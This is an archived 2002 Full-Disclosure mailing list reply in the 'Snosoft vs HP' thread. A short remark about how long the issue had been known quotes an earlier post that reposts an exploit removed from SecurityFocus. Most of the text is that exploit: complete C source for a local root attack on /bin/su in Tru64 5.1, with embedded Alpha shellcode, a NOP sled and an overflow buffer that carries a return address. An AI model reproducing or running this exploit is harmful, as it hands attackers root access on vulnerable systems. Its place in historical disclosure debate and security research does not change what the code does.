[Full-Disclosure] OT: Snosoft vs HP

From: ATD (full-disclosure@lists.netsys.com)
Date: 07/31/02 

From: full-disclosure@lists.netsys.com (ATD)
Date: 31 Jul 2002 12:26:40 -0400

--=-joB5aea9hu6lfbKKlHGb
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.

Adriel

On Wed, 2002-07-31 at 12:22, Len Rose wrote:
>=20
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?=20
>=20
> Obligatory exploit:
>=20
> /*
> /bin/su tru64 5.1
> works with non-exec stack enabled
> =20
> stripey is the man
>=20
> developed at http://www.snosoft.com in the cerebrum labs
>=20
> phased
> phased at mail.ru
> */
>=20
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>=20
> char shellcode[]=3D
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> "\x12\x14\x02\x42" /* addq $16,16,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\x12\x94\x09\x42" /* addq $16,76,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> "\x10\x04\xff\x47" /* clr $16 */
> "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> "\x20\x35\x20\x42" /* subq $17,1,$0 */
> "\xff\xff\xff\xff" /* callsys ( disguised ) */
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> "\x12\x04\xff\x47" /* clr $18 */
> "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> "\x20\x35\x60\x42" /* subq $19,1,$0 */
> "\xff\xff\xff\xff"; /* callsys ( disguised ) */
>=20
> /* shellcode by Taeho Oh */
>=20
> main(int argc, char *argv[]) {
> int i, j;
> char buffer[8239];
> char payload[15200];
> char nop[] =3D "\x1f\x04\xff\x47";
>=20
> bzero(&buffer, 8239);
> bzero(&payload, 15200);
>=20
> for (i=3D0;i<8233;i++)
> buffer[i] =3D 0x41;
>=20
> /* 0x140010401 */
>=20
> buffer[i++] =3D 0x01;
> buffer[i++] =3D 0x04;
> buffer[i++] =3D 0x01;
> buffer[i++] =3D 0x40;
> buffer[i++] =3D 0x01;
>=20
> for (i=3D0;i<15000;) {
> for(j=3D0;j<4;j++) {
> payload[i++] =3D nop[j];
> }
> }
>=20
> for (i=3Di,j=3D0;j<sizeof(shellcode);i++,j++)
> payload[i] =3D shellcode[j];
>=20
> printf("/bin/su by phased\n");
> printf("payload %db\n", strlen(payload));
> printf("buffer %db\n", strlen(buffer));
>=20
> execl("/usr/bin/su", "su", buffer, payload, 0);
>=20
> }
>=20
>=20
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>=20
--=20

-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project | cerebrum@snosoft.com
Strategic Reconnaissance Team | recon@snosoft.com
-------------------------------------------------------

--=-joB5aea9hu6lfbKKlHGb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9SA/AHs/COEe/P4cRAqfbAKDVfyE4pBXp8Q3vnoSWZELWWsoi5QCfXLZy
FCiU9wNkCn0zqxXxoJxSi80=
=ZMCY
-----END PGP SIGNATURE-----

--=-joB5aea9hu6lfbKKlHGb--